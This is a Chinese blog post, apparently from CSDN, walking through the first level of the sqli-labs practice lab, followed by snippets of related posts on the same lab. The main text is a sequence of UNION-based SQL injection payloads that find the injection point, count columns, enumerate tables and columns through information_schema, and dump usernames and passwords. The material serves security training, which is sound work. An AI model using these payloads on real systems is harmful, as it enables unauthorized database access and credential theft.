sql-lib第一关

于 2024-08-05 22:54:13 发布
阅读量224 收藏 3
点赞数 7
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jy2091574485/article/details/140938858
版权

注入语句为:

id=1' and 1=1 -- -
 

1.判断注入点

 

2、把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入

3、确定注入字符后,判断有多少列, 超出列数会报错:id=1' order by 4 -- -

4、判断数据显示点:id=0' union select 1,2,3 -- -

5、然后便可在注入字符后加入前面的sql注入基本语句

order by 4 -- -
判断有多少列
union select 1,2,3 -- -
判断数据显示点
union select 1,user(),database()­­ -- -
­显示出登录用户和数据库名
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3 -- -
查看数据库有哪些表
union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ),3 -- -
查看对应表有哪些列
union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3 -- -
查看账号密码信息
 

落雪映月
关注
sql-lib 闯关课程第一课
tmgt的博客
04-25 3029
sql-libs是github上的一个专注于sql注入的平台,目前网上关于这个平台的资源很多,我的这个系列主要是分享与总结我得心得,下面开始吧 sql-libs下载地址 链接: sql-libs下载地址. less1 我采用的环境是phpstudy集成环境,网上的教程很多,可以自行寻找搭建。我搭建的环境是php5.2.17+Apache2.4.39+Mysql8.0环境,在php5.2环境中mag...
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1923
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sql_libs第一关
Xor0ne
02-17 1086
第一关通关笔记:2019/6/16 低等级详解的相关网站:https://www.jianshu.com/p/078df7a35671 http://www.storysec.com/dvwa-sql-injection.html dvwa的闯关:https://www.freebuf.com/articles/web/120747.html BP:https://blog.csdn.ne...
sqli-labs一第一关详细步骤,新手打基础篇
qq_50956249的博客
03-21 643
5、查出数据库名称后,爆破表名,union 1,group_concat(table_name),3,…union 1,2,group_concat(column_name),…7、查出了具体的字段名,最后一步就是查出具体的数据了,union 1,2,group _concat(username,id,password) from users–+4、先查出使用的是哪个数据库,用database()函数,以及数据库版本信息,用version()函数。输入1’–+,有用户显示。输入 1,有用户显示。
sqlilab第一关
qq_45491497的博客
07-28 2024
1.判断注入方式为字符型 输入正常id=1 注入引号 可以推断查询语句为select * from users where id=1 limit 0,1; (ps:users表只是举例) 打开第一关的php源码查看结果 打开数据库命令行查询结果 2.查询库名 <1>判断表有几列 当输入order by 3时未报错,而order by 4报错,说明表有三列 <2>判断回显的位置 为了union后的语句可生效,需将之前的报错,改为-1 se.
Sqli-libs通关详解__第一关
henghengzhao_的博客
10-04 963
sqli-libs通关详解,第一关通关详解
sqli-labs第一关
最新发布
2402_82441920的博客
07-03 535
sqli-labs 第一关是一个关于 SQL 注入的挑战。以下是一般情况下的通关摘要: 判断是否存在注入点:在 URL 中?id=1 后面加上单引号,观察页面是否报错。如果报错,说明此处没有过滤掉引号,存在注入点。 判断注入类型:分析报错语句,根据引号的情况判断是字符型注入还是整型注入。在此关中,报错信息中有多个单引号,说明是字符型注入。 判断字段数(列数):使用 order by 加数字的方式进行试探,直到出现报错,从而确定表中的字段数。例如?id=1' order by 4 –+报错,说明有 3 列。
sqllib闯关攻略_01
Xor0ne
07-10 1954
1.Less_01 1.1、寻找报错点,观察闭合方式 在网站上不断地进行奇怪字符串添加看是否产生报错显示,报错后,再添加注释符查看是否还会报错。 http://192.168.31.61:8081/sqli-labs-master/Less-1/?id=1 http://192.168.31.61:8081/sqli-labs-master/Less-1/?id=1’ 【单引号】 http://192.168.31.61:8081/sqli-labs-master/Less-1/?id=1” 【双引
common-python-lib-poc
03-21
"通用python-lib-poc"是一个针对Python编程语言的漏洞验证工具集合。这个工具包主要用于测试和识别Python库中的潜在安全漏洞,确保应用的安全性。在IT安全领域,POC(Proof of Concept)通常指的是概念验证,它证明...
最详细sqli-labs平台前十关讲解
妙蛙种子吃了都会妙妙秒的妙脆角的博客
01-10 3517
最详细sqli-labs平台sql注入语法讲解 文章目录最详细sqli-labs平台sql注入语法讲解一、sql注入的简单介绍二、sqli-labs平台的搭建二、实验1.Less-1(single quotes)2.Less-2(intiger based)3.Less-3(single quotes with twist)4.Less-4(double quotes)5.Less-5 最近也是沉迷于学习sql注入,越是了解越是发现其中的奥妙与乐趣,在这篇文章中主要是以sqli-labs平台为例子,记录一些
sqli-labs靶场(1-22关)
weixin_51566481的博客
08-16 7690
sqli-labs,sql注入,burpsuit
Sql-labs的第一关
繁星
06-07 650
Sql注入要求我们对数据库的结构要有一个大概的了解,这要就能更容易去操作!!!
sqli_labs第一关
qq726232111的博客
08-11 1697
小萌新入坑,从sqli-labs开始搞起 Less-1 提示:测试时要使用英文模式下字符!!!!!!要仔细查看是否字符有误导致无法返回信息!!!!! 0x0 信息分析 搭建好环境后来到Less-1的页面查看页面提示信息并分析 此时可以看到给出的提示信息 Please input the ID as parameter with numeric value 翻译 请输入ID作为...
SQL注入(sqli-labs第一关
lsswyy的博客
05-10 755
id=-1' union select 1,2,3--+    (将id弄成一个负数的值,使前面的语句失效)然后看看union查询是否有回显位。id=1' and '1'='1' order by 1--+  页面回显正常。id=1' and '1'='1' order by 2--+  页面回显正常。id=1' and '1'='1' order by 3--+  页面回显正常。然后,由我们正常的思维,我们的账号和密码肯定在一张表上,我们看到了users表,id=1' and '1'='1页面回显正常。
sqli-labs靶场第一关
weixin_72583035的博客
01-30 457
这是一个语法报错,因为在所有语句中单双引号必须成对出现,我们加了一个单引号就让我们从单引号里逃逸出来了,我们再加的单引号后面写语句就是我们能控制的了,但是里面还是有三个单引号,所有我们要想办法注释后面的语句或者让单引号成对。我们找到了我们的库名security现在就要找表名了,我们要构造查询列表名,information_schema.table存储了数据库中的所有表的信息。用order by 排序时用二分法排序,这里因为这个数据库的列比较少就不演示了,我们排出来数据库有3列。这样就可以过第一关了;
sqli-labs关卡1(基于get提交的单引号闭合的字符型注入)通关思路
zyh1588的博客
10-20 444
萌新之练习sqli-labs靶场第一关
sqlilabs第一关懵逼小解答
zlloveyouforever的博客
03-13 4999
sqlilabs第一关新手大解惑,小白看过来,大佬不要来。绝对很详细哦,骗你是修勾。
sqli-labs靶场第一关详解
qq_43784516的博客
01-28 1536
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sqllibs 闯关
08-25
- *1* *3* [sql-lib 闯关课程第一课](https://blog.csdn.net/m0_37175113/article/details/105753588)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值